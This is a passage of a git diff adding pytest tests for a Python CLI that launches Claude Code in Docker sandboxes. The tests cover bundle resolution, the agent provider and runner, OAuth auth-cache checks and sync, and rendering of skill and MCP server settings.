_team("t", bundles=("missing",))}, + catalog=catalog, + ) + with pytest.raises(BundleResolutionError) as exc_info: + resolve_render_plan(org, "t", "claude", fail_closed=True) + err = exc_info.value + assert set(err.available_bundles) == {"alpha", "beta", "gamma"} + + def test_fail_closed_error_available_bundles_sorted(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={ + "zebra": ArtifactBundle(name="zebra"), + "alpha": ArtifactBundle(name="alpha"), + "middle": ArtifactBundle(name="middle"), + }, + ) + org = _org( + profiles={"t": _team("t", bundles=("ghost",))}, + catalog=catalog, + ) + with pytest.raises(BundleResolutionError) as exc_info: + resolve_render_plan(org, "t", "claude", fail_closed=True) + assert list(exc_info.value.available_bundles) == ["alpha", "middle", "zebra"] + + def test_fail_closed_error_user_message_is_actionable(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={"real": ArtifactBundle(name="real")}, + ) + org = _org( + profiles={"t": _team("t", bundles=("fake",))}, + catalog=catalog, + ) + with pytest.raises(BundleResolutionError) as exc_info: + resolve_render_plan(org, "t", "claude", fail_closed=True) + msg = str(exc_info.value) + assert "fake" in msg + assert "real" in msg + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 7: Missing artifact in bundle — partial resolution +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestMissingArtifactContract: + """Missing artifact in bundle → partial resolution with skip report.""" + + def test_valid_artifacts_still_effective(self) -> None: + """Good artifacts resolve; only the missing one is skipped.""" + catalog = GovernedArtifactsCatalog( + artifacts={"good": _skill("good")}, + bindings={}, + bundles={ + "b": ArtifactBundle(name="b", artifacts=("good", "ghost")), + }, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == ("good",) + assert plan.skipped == ("ghost",) + + def test_diagnostic_names_missing_artifact(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("phantom",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert len(result.diagnostics) == 1 + assert result.diagnostics[0].artifact_name == "phantom" + assert "not found" in result.diagnostics[0].reason + + def test_fail_closed_raises_for_missing_artifact(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"good": _skill("good")}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("good", "bad"))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + with pytest.raises(InvalidArtifactReferenceError) as exc_info: + resolve_render_plan(org, "t", "claude", fail_closed=True) + assert exc_info.value.artifact_name == "bad" + assert exc_info.value.bundle_id == "b" + + def test_multiple_missing_artifacts_produce_multiple_diagnostics(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("miss-1", "miss-2", "miss-3"))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert len(result.diagnostics) == 3 + names = {d.artifact_name for d in result.diagnostics} + assert names == {"miss-1", "miss-2", "miss-3"} + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 8: Empty team config +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestEmptyTeamConfigContract: + """Empty team config → empty plan, no error.""" + + def test_no_enabled_bundles(self) -> None: + org = _org(profiles={"t": _team("t")}) + result = resolve_render_plan(org, "t", "claude") + assert result.plans == () + assert result.diagnostics == () + + def test_empty_enabled_bundles_tuple(self) -> None: + org = _org(profiles={"t": _team("t", bundles=())}) + result = resolve_render_plan(org, "t", "claude") + assert result.plans == () + assert result.diagnostics == () + + def test_team_with_empty_bundle(self) -> None: + """Bundle exists but has no artifacts → empty plan, no error.""" + org = _org( + profiles={"t": _team("t", bundles=("empty-bundle",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "t", "claude") + assert len(result.plans) == 1 + assert result.plans[0].effective_artifacts == () + assert result.plans[0].skipped == () + assert result.diagnostics == () + + def test_missing_team_raises_value_error(self) -> None: + org = _org(profiles={"alpha": _team("alpha")}) + with pytest.raises(ValueError, match="not found"): + resolve_render_plan(org, "nonexistent", "claude") + + def test_missing_team_error_lists_available_profiles(self) -> None: + org = _org(profiles={"dev": _team("dev"), "ops": _team("ops")}) + with pytest.raises(ValueError, match="dev"): + resolve_render_plan(org, "ghost", "claude") + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 9: Structural contracts — types, immutability, purity +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestStructuralContract: + """Return types, tuple immutability, and pure function guarantees.""" + + def test_result_is_bundle_resolution_result(self) -> None: + org = _org(profiles={"t": _team("t")}) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result, BundleResolutionResult) + + def test_plans_are_tuples(self) -> None: + org = _org( + profiles={"t": _team("t", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result.plans, tuple) + + def test_diagnostics_are_tuples(self) -> None: + org = _org(profiles={"t": _team("t")}) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result.diagnostics, tuple) + + def test_plan_is_artifact_render_plan(self) -> None: + org = _org( + profiles={"t": _team("t", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result.plans[0], ArtifactRenderPlan) + + def test_plan_bindings_are_tuples(self) -> None: + org = _org( + profiles={"t": _team("t", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert isinstance(plan.bindings, tuple) + assert isinstance(plan.skipped, tuple) + assert isinstance(plan.effective_artifacts, tuple) + + def test_diagnostic_is_typed(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={"b": ArtifactBundle(name="b", artifacts=("missing",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result.diagnostics[0], BundleResolutionDiagnostic) + + def test_pure_function_no_state_mutation(self) -> None: + """Calling resolve_render_plan twice returns identical results.""" + org = _org( + profiles={"t": _team("t", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result_1 = resolve_render_plan(org, "t", "claude") + result_2 = resolve_render_plan(org, "t", "claude") + assert result_1.plans == result_2.plans + assert result_1.diagnostics == result_2.diagnostics + + def test_different_providers_produce_different_plans(self) -> None: + """Same config, different providers → different plan contents.""" + org = _org( + profiles={"t": _team("t", bundles=("github-integration",))}, + catalog=_FULL_CATALOG, + ) + claude = resolve_render_plan(org, "t", "claude") + codex = resolve_render_plan(org, "t", "codex") + # Plans are structurally different (different effective/skipped sets) + assert claude.plans[0].effective_artifacts != codex.plans[0].effective_artifacts + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Internal function contract: _resolve_single_bundle +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestResolveSingleBundleContract: + """Direct tests on _resolve_single_bundle for edge cases.""" + + def test_returns_plan_and_diagnostics_tuple(self) -> None: + plan, diags = _resolve_single_bundle("dev-essentials", "claude", _FULL_CATALOG) + assert isinstance(plan, ArtifactRenderPlan) + assert isinstance(diags, list) + + def test_missing_bundle_soft_returns_empty_plan(self) -> None: + plan, diags = _resolve_single_bundle("nonexistent", "claude", _FULL_CATALOG) + assert plan.effective_artifacts == () + assert len(diags) == 1 + + def test_missing_bundle_fail_closed_raises(self) -> None: + with pytest.raises(BundleResolutionError): + _resolve_single_bundle("nonexistent", "claude", _FULL_CATALOG, fail_closed=True) + + def test_disabled_bundle_returns_empty_plan(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"s": _skill("s")}, + bindings={}, + bundles={ + "dis": ArtifactBundle( + name="dis", + artifacts=("s",), + install_intent=ArtifactInstallIntent.DISABLED, + ), + }, + ) + plan, diags = _resolve_single_bundle("dis", "claude", catalog) + assert plan.effective_artifacts == () + assert len(diags) == 1 + assert "disabled" in diags[0].reason + + def test_invalid_artifact_soft_mode_skips(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("ghost",))}, + ) + plan, diags = _resolve_single_bundle("b", "claude", catalog) + assert plan.skipped == ("ghost",) + assert len(diags) == 1 + + def test_invalid_artifact_fail_closed_raises(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("ghost",))}, + ) + with pytest.raises(InvalidArtifactReferenceError): + _resolve_single_bundle("b", "claude", catalog, fail_closed=True) diff --git a/tests/test_claude_adapter.py b/tests/test_claude_adapter.py index ffe6fdb..eccd5a9 100644 --- a/tests/test_claude_adapter.py +++ b/tests/test_claude_adapter.py @@ -12,9 +12,9 @@ import pytest -from scc_cli import claude_adapter +from scc_cli.adapters import claude_settings as claude_adapter +from scc_cli.adapters.claude_settings import AuthResult from scc_cli.application.compute_effective_config import EffectiveConfig, MCPServer -from scc_cli.claude_adapter import AuthResult # ═══════════════════════════════════════════════════════════════════════════════ # Test Fixtures diff --git a/tests/test_claude_agent_provider.py b/tests/test_claude_agent_provider.py new file mode 100644 index 0000000..b37a26b --- /dev/null +++ b/tests/test_claude_agent_provider.py @@ -0,0 +1,261 @@ +"""Characterization tests for ClaudeAgentProvider. + +These tests pin the exact AgentLaunchSpec shape that ClaudeAgentProvider +produces so that regressions in the adapter seam are caught immediately. +""" + +from __future__ import annotations + +import json +import subprocess +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider +from scc_cli.core.contracts import AuthReadiness +from scc_cli.core.errors import ProviderNotReadyError + +# ═══════════════════════════════════════════════════════════════════════════════ +# Fixtures +# ═══════════════════════════════════════════════════════════════════════════════ + + +@pytest.fixture() +def provider() -> ClaudeAgentProvider: + return ClaudeAgentProvider() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# capability_profile +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_capability_profile_returns_claude_metadata(provider: ClaudeAgentProvider) -> None: + """capability_profile() must return the stable Claude provider metadata.""" + profile = provider.capability_profile() + + assert profile.provider_id == "claude" + assert profile.display_name == "Claude Code" + assert profile.required_destination_set == "anthropic-core" + assert profile.supports_resume is True + + +# ═══════════════════════════════════════════════════════════════════════════════ +# prepare_launch — without settings_path +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_prepare_launch_without_settings_produces_clean_spec( + provider: ClaudeAgentProvider, tmp_path: Path +) -> None: + """No settings_path → artifact_paths is empty, env is empty, argv is canonical.""" + spec = provider.prepare_launch(config={}, workspace=tmp_path, settings_path=None) + + assert spec.provider_id == "claude" + assert spec.argv == ("claude", "--dangerously-skip-permissions") + assert spec.env == {} + assert spec.artifact_paths == () + assert spec.required_destination_sets == ("anthropic-core",) + assert spec.workdir == tmp_path + + +# ═══════════════════════════════════════════════════════════════════════════════ +# prepare_launch — with settings_path +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_prepare_launch_with_settings_includes_artifact_path( + provider: ClaudeAgentProvider, tmp_path: Path +) -> None: + """settings_path present → it appears in artifact_paths; env stays empty.""" + fake_settings = tmp_path / "claude-settings.json" + fake_settings.write_text("{}") + + spec = provider.prepare_launch( + config={"mcpServers": {}}, workspace=tmp_path, settings_path=fake_settings + ) + + assert fake_settings in spec.artifact_paths + assert spec.env == {} + + +# ═══════════════════════════════════════════════════════════════════════════════ +# prepare_launch — env contract (D003 / KNOWLEDGE.md) +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_prepare_launch_env_is_clean_str_to_str( + provider: ClaudeAgentProvider, tmp_path: Path +) -> None: + """All env values must be plain str, never nested dicts (D003 contract).""" + spec = provider.prepare_launch(config={"key": "value"}, workspace=tmp_path) + + for key, val in spec.env.items(): + assert isinstance(key, str), f"env key {key!r} is not str" + assert isinstance(val, str), f"env value for {key!r} is not str: {val!r}" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# auth_check — D037: adapter-owned auth readiness +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _mock_docker_run_claude( + *, + volume_rc: int = 0, + oauth_cat_rc: int = 0, + oauth_cat_stdout: bytes = b'{"token":"abc"}', + host_cat_rc: int = 1, + host_cat_stdout: bytes = b"", + volume_exc: Exception | None = None, + oauth_cat_exc: Exception | None = None, + host_cat_exc: Exception | None = None, +) -> MagicMock: + """Route subprocess.run by Docker subcommand for Claude auth checks.""" + + def _side_effect(cmd: list[str], **_kw: object) -> subprocess.CompletedProcess[bytes]: + if "volume" in cmd and "inspect" in cmd: + if volume_exc is not None: + raise volume_exc + return subprocess.CompletedProcess(cmd, volume_rc, b"", b"") + if cmd[-1].endswith("/.credentials.json"): + if oauth_cat_exc is not None: + raise oauth_cat_exc + return subprocess.CompletedProcess(cmd, oauth_cat_rc, oauth_cat_stdout, b"") + if cmd[-1].endswith("/.claude.json"): + if host_cat_exc is not None: + raise host_cat_exc + return subprocess.CompletedProcess(cmd, host_cat_rc, host_cat_stdout, b"") + return subprocess.CompletedProcess(cmd, 0, b"", b"") + + return MagicMock(side_effect=_side_effect) + + +class TestClaudeAuthCheck: + """auth_check() validates Claude OAuth credential presence (D037).""" + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_auth_present_valid_json( + self, mock_run: MagicMock, provider: ClaudeAgentProvider + ) -> None: + mock_run.side_effect = _mock_docker_run_claude( + oauth_cat_stdout=json.dumps({"accessToken": "tok"}).encode() + ).side_effect + result = provider.auth_check() + assert result.status == "present" + assert result.mechanism == "oauth_file" + assert "auth cache present" in result.guidance + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_auth_present_from_host_claude_json( + self, mock_run: MagicMock, provider: ClaudeAgentProvider + ) -> None: + mock_run.side_effect = _mock_docker_run_claude( + oauth_cat_rc=1, + host_cat_rc=0, + host_cat_stdout=json.dumps({"oauthAccount": {"email": "user@example.com"}}).encode(), + ).side_effect + result = provider.auth_check() + assert result.status == "present" + assert "auth cache present" in result.guidance + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_auth_file_missing(self, mock_run: MagicMock, provider: ClaudeAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_claude(oauth_cat_rc=1, host_cat_rc=1).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert ".credentials.json" in result.guidance + assert ".claude.json" in result.guidance + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_auth_file_empty(self, mock_run: MagicMock, provider: ClaudeAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_claude( + oauth_cat_stdout=b"", + host_cat_rc=1, + ).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert ".claude.json" in result.guidance or ".credentials.json" in result.guidance + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_auth_file_invalid_json( + self, mock_run: MagicMock, provider: ClaudeAgentProvider + ) -> None: + mock_run.side_effect = _mock_docker_run_claude( + oauth_cat_stdout=b"not-json{{{", + ).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "invalid JSON" in result.guidance + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_volume_missing(self, mock_run: MagicMock, provider: ClaudeAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_claude(volume_rc=1).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "scc start" in result.guidance + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_docker_not_reachable(self, mock_run: MagicMock, provider: ClaudeAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_claude( + volume_exc=FileNotFoundError("docker not found") + ).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "Cannot reach Docker" in result.guidance + + @patch("scc_cli.adapters.claude_agent_provider.subprocess.run") + def test_cat_timeout(self, mock_run: MagicMock, provider: ClaudeAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_claude( + oauth_cat_exc=subprocess.TimeoutExpired(cmd=["docker"], timeout=30) + ).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert ".credentials.json" in result.guidance or ".claude.json" in result.guidance + + +class TestClaudeBootstrapAuth: + """bootstrap_auth() uses browser auth and confirms cache presence afterwards.""" + + @patch("scc_cli.adapters.claude_agent_provider.run_claude_browser_auth") + def test_bootstrap_auth_succeeds_when_auth_cache_becomes_present( + self, + mock_browser_auth: MagicMock, + provider: ClaudeAgentProvider, + ) -> None: + mock_browser_auth.return_value = 0 + with patch.object( + provider, + "auth_check", + return_value=AuthReadiness( + status="present", + mechanism="oauth_file", + guidance="Claude auth cache present — no action needed", + ), + ): + provider.bootstrap_auth() + + mock_browser_auth.assert_called_once() + + @patch("scc_cli.adapters.claude_agent_provider.run_claude_browser_auth") + def test_bootstrap_auth_raises_when_cache_still_missing( + self, + mock_browser_auth: MagicMock, + provider: ClaudeAgentProvider, + ) -> None: + mock_browser_auth.return_value = 1 + with patch.object( + provider, + "auth_check", + return_value=AuthReadiness( + status="missing", + mechanism="oauth_file", + guidance="Auth cache still missing", + ), + ): + with pytest.raises(ProviderNotReadyError): + provider.bootstrap_auth() + + mock_browser_auth.assert_called_once() diff --git a/tests/test_claude_agent_runner.py b/tests/test_claude_agent_runner.py new file mode 100644 index 0000000..72ea5d0 --- /dev/null +++ b/tests/test_claude_agent_runner.py @@ -0,0 +1,54 @@ +"""Tests for ClaudeAgentRunner adapter.""" + +from __future__ import annotations + +import json +from pathlib import Path + +from scc_cli.adapters.claude_agent_runner import DEFAULT_SETTINGS_PATH, ClaudeAgentRunner + + +class TestClaudeAgentRunner: + """Canonical test shape for ClaudeAgentRunner.""" + + def test_build_settings_returns_claude_path(self) -> None: + runner = ClaudeAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + assert settings.path == Path("/home/agent/.claude/settings.json") + assert settings.suffix == ".json" + + def test_build_settings_renders_json_bytes(self) -> None: + """D035: runner serialises config to JSON, not dict passthrough.""" + runner = ClaudeAgentRunner() + config = {"enabledPlugins": ["tool@official"], "permissions": {}} + settings = runner.build_settings(config, path=DEFAULT_SETTINGS_PATH) + assert isinstance(settings.rendered_bytes, bytes) + # Verify it's valid JSON by round-tripping + parsed = json.loads(settings.rendered_bytes) + assert parsed["enabledPlugins"] == ["tool@official"] + assert parsed["permissions"] == {} + + def test_build_settings_empty_config_renders_valid_json(self) -> None: + """Empty config produces valid JSON bytes.""" + runner = ClaudeAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + parsed = json.loads(settings.rendered_bytes) + assert parsed == {} + + def test_build_command_returns_claude_argv(self) -> None: + runner = ClaudeAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + command = runner.build_command(settings) + assert command.argv == ["claude"] + + def test_describe_returns_claude_code(self) -> None: + runner = ClaudeAgentRunner() + assert runner.describe() == "Claude Code" + + def test_env_is_clean_str_to_str(self) -> None: + """D003 contract guard: env dict must be empty str→str.""" + runner = ClaudeAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + command = runner.build_command(settings) + assert command.env == {} + assert isinstance(command.env, dict) diff --git a/tests/test_claude_auth.py b/tests/test_claude_auth.py new file mode 100644 index 0000000..50efe04 --- /dev/null +++ b/tests/test_claude_auth.py @@ -0,0 +1,76 @@ +"""Tests for host-side Claude auth bootstrap.""" + +from __future__ import annotations + +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.adapters import claude_auth +from scc_cli.core.errors import ProviderNotReadyError + + +def test_build_claude_browser_auth_command_uses_host_claude_cli() -> None: + assert claude_auth.build_claude_browser_auth_command() == [ + "claude", + "auth", + "login", + "--claudeai", + ] + + +@patch("scc_cli.adapters.claude_auth._sync_host_claude_auth_to_volume") +@patch("scc_cli.adapters.claude_auth.subprocess.run") +def test_run_claude_browser_auth_syncs_after_success( + mock_run: MagicMock, + mock_sync: MagicMock, +) -> None: + mock_run.return_value = MagicMock(returncode=0) + + result = claude_auth.run_claude_browser_auth() + + assert result == 0 + mock_run.assert_called_once_with(["claude", "auth", "login", "--claudeai"], check=False) + mock_sync.assert_called_once_with() + + +@patch("scc_cli.adapters.claude_auth._sync_host_claude_auth_to_volume") +@patch("scc_cli.adapters.claude_auth.subprocess.run") +def test_run_claude_browser_auth_skips_sync_after_failure( + mock_run: MagicMock, + mock_sync: MagicMock, +) -> None: + mock_run.return_value = MagicMock(returncode=1) + + result = claude_auth.run_claude_browser_auth() + + assert result == 1 + mock_sync.assert_not_called() + + +@patch("scc_cli.adapters.claude_auth.subprocess.run", side_effect=FileNotFoundError("claude")) +def test_run_claude_browser_auth_raises_when_host_claude_missing(_mock_run: MagicMock) -> None: + with pytest.raises(ProviderNotReadyError, match="host 'claude' CLI is not installed"): + claude_auth.run_claude_browser_auth() + + +@patch("scc_cli.adapters.claude_auth.subprocess.run") +@patch("scc_cli.adapters.claude_auth.Path.home") +def test_sync_host_claude_auth_to_volume_writes_claude_json( + mock_home: MagicMock, + mock_run: MagicMock, + tmp_path: Path, +) -> None: + host_file = tmp_path / ".claude.json" + host_file.write_text('{"oauthAccount":{"email":"user@example.com"}}') + mock_home.return_value = tmp_path + mock_run.return_value = MagicMock(returncode=0) + + claude_auth._sync_host_claude_auth_to_volume() + + assert mock_run.call_count == 1 + args = mock_run.call_args.args[0] + assert args[:4] == ["docker", "run", "--rm", "-i"] + assert "docker-claude-sandbox-data:/data" in args + assert mock_run.call_args.kwargs["input"] == '{"oauthAccount":{"email":"user@example.com"}}' diff --git a/tests/test_claude_renderer.py b/tests/test_claude_renderer.py new file mode 100644 index 0000000..9903113 --- /dev/null +++ b/tests/test_claude_renderer.py @@ -0,0 +1,1481 @@ +"""Characterization tests for the Claude renderer. + +Verifies that render_claude_artifacts() produces expected file structures +and settings fragments from known ArtifactRenderPlans. + +Covers: +- Empty plan → empty result +- Skill binding → skill metadata file under .scc-managed/skills/ +- MCP server binding (SSE/HTTP/stdio) → mcpServers settings fragment +- Native integration binding (hooks, marketplace, plugin, instructions) +- Mixed bundle with multiple binding types +- Plan targeting wrong provider → skip with warning +- Non-claude binding in plan → skip with warning +- Empty native_ref on skill → warning +- Missing URL on MCP SSE → warning +- Settings fragment audit file written for non-empty fragments +- Deterministic/idempotent rendering (same plan → same output) +- Skipped artifact: Codex-only binding in Claude plan → skipped with reason +- Binding classifier: skill / mcp / native / unknown classification +- Internal helpers: _render_skill_binding with null native_ref, + _merge_settings_fragment with nested dict merging +- MCP edge cases: non-string args, no headers, no env, unknown transport +""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any + +import pytest + +from scc_cli.adapters.claude_renderer import ( + SCC_MANAGED_DIR, + RendererResult, + _classify_binding, + _merge_settings_fragment, + _render_mcp_binding, + _render_skill_binding, + render_claude_artifacts, +) +from scc_cli.core.errors import MaterializationError, MergeConflictError +from scc_cli.core.governed_artifacts import ( + ArtifactKind, + ArtifactRenderPlan, + PortableArtifact, + ProviderArtifactBinding, +) + +# --------------------------------------------------------------------------- +# Fixtures +# --------------------------------------------------------------------------- + + +@pytest.fixture() +def workspace(tmp_path: Path) -> Path: + """Return a fresh temporary workspace directory.""" + return tmp_path + + +def _plan( + *, + bundle_id: str = "test-bundle", + provider: str = "claude", + bindings: tuple[ProviderArtifactBinding, ...] = (), + skipped: tuple[str, ...] = (), + effective_artifacts: tuple[str, ...] = (), + portable_artifacts: tuple[PortableArtifact, ...] = (), +) -> ArtifactRenderPlan: + return ArtifactRenderPlan( + bundle_id=bundle_id, + provider=provider, + bindings=bindings, + skipped=skipped, + effective_artifacts=effective_artifacts, + portable_artifacts=portable_artifacts, + ) + + +# --------------------------------------------------------------------------- +# Empty / trivial +# --------------------------------------------------------------------------- + + +class TestEmptyPlan: + def test_empty_plan_produces_empty_result(self, workspace: Path) -> None: + result = render_claude_artifacts(_plan(), workspace) + assert isinstance(result, RendererResult) + assert result.rendered_paths == () + assert result.skipped_artifacts == () + assert result.warnings == () + assert result.settings_fragment == {} + + def test_empty_bindings_with_skipped(self, workspace: Path) -> None: + plan = _plan(skipped=("ghost-artifact",)) + result = render_claude_artifacts(plan, workspace) + assert result.skipped_artifacts == ("ghost-artifact",) + assert result.rendered_paths == () + + +# --------------------------------------------------------------------------- +# Wrong provider +# --------------------------------------------------------------------------- + + +class TestWrongProvider: + def test_non_claude_provider_produces_warning(self, workspace: Path) -> None: + plan = _plan(provider="codex", effective_artifacts=("some-skill",)) + result = render_claude_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "codex" in result.warnings[0] + assert "nothing rendered" in result.warnings[0] + assert result.skipped_artifacts == ("some-skill",) + + def test_non_claude_binding_in_claude_plan(self, workspace: Path) -> None: + plan = _plan( + bindings=(ProviderArtifactBinding(provider="codex", native_ref="skills/foo"),), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "codex" in result.warnings[0] + + +# --------------------------------------------------------------------------- +# Skill binding +# --------------------------------------------------------------------------- + + +class TestSkillBinding: + def test_skill_creates_metadata_file(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/code-review", + ), + ), + effective_artifacts=("code-review-skill",), + ) + result = render_claude_artifacts(plan, workspace) + + assert result.warnings == () + assert len(result.rendered_paths) >= 1 + + # Check the skill metadata file exists + skill_dir = workspace / SCC_MANAGED_DIR / "skills" / "skills_code-review" + metadata_path = skill_dir / "skill.json" + assert metadata_path.exists() + + content = json.loads(metadata_path.read_text()) + assert content["native_ref"] == "skills/code-review" + assert content["provider"] == "claude" + assert content["bundle_id"] == "test-bundle" + assert content["managed_by"] == "scc" + + def test_skill_with_native_config(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/review", + native_config={"priority": "high"}, + ), + ), + ) + render_claude_artifacts(plan, workspace) + + skill_dir = workspace / SCC_MANAGED_DIR / "skills" / "skills_review" + content = json.loads((skill_dir / "skill.json").read_text()) + assert content["native_config"] == {"priority": "high"} + + def test_skill_no_native_ref_produces_warning(self, workspace: Path) -> None: + plan = _plan( + bindings=(ProviderArtifactBinding(provider="claude"),), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.warnings) >= 1 + assert any( + "no native_ref" in w or "no recognised" in w.lower() or "no native_ref" in w.lower() + for w in result.warnings + ) + + +# --------------------------------------------------------------------------- +# MCP server binding +# --------------------------------------------------------------------------- + + +class TestMCPBinding: + def test_sse_mcp_server(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="github-mcp", + transport_type="sse", + native_config={"url": "http://localhost:8080/sse"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + assert "mcpServers" in result.settings_fragment + mcp = result.settings_fragment["mcpServers"] + assert "github-mcp" in mcp + assert mcp["github-mcp"]["type"] == "sse" + assert mcp["github-mcp"]["url"] == "http://localhost:8080/sse" + + def test_http_mcp_server(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="my-server", + transport_type="http", + native_config={"url": "https://api.example.com/mcp"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + mcp = result.settings_fragment["mcpServers"] + assert mcp["my-server"]["type"] == "http" + assert mcp["my-server"]["url"] == "https://api.example.com/mcp" + + def test_stdio_mcp_server(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="local-mcp", + transport_type="stdio", + native_config={ + "command": "/usr/bin/my-mcp-server", + "args": "--port 9090 --verbose", + "env_API_KEY": "placeholder", + }, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + mcp = result.settings_fragment["mcpServers"] + assert "local-mcp" in mcp + assert mcp["local-mcp"]["type"] == "stdio" + assert mcp["local-mcp"]["command"] == "/usr/bin/my-mcp-server" + assert mcp["local-mcp"]["args"] == ["--port", "9090", "--verbose"] + assert mcp["local-mcp"]["env"] == {"API_KEY": "placeholder"} + + def test_sse_mcp_with_headers(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="authed-mcp", + transport_type="sse", + native_config={ + "url": "https://mcp.example.com/sse", + "header_Authorization": "Bearer tok", + "header_X-Org": "my-org", + }, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + mcp = result.settings_fragment["mcpServers"] + assert mcp["authed-mcp"]["headers"] == { + "Authorization": "Bearer tok", + "X-Org": "my-org", + } + + def test_mcp_no_url_produces_warning(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="broken-mcp", + transport_type="sse", + native_config={}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert any("no 'url'" in w for w in result.warnings) + + def test_mcp_no_command_produces_warning(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="broken-stdio", + transport_type="stdio", + native_config={}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert any("no 'command'" in w for w in result.warnings) + + def test_mcp_fallback_name_when_no_native_ref(self, workspace: Path) -> None: + plan = _plan( + bundle_id="my-bundle", + bindings=( + ProviderArtifactBinding( + provider="claude", + transport_type="sse", + native_config={"url": "http://localhost:9090"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + mcp = result.settings_fragment["mcpServers"] + assert "scc-my-bundle-mcp" in mcp + + +# 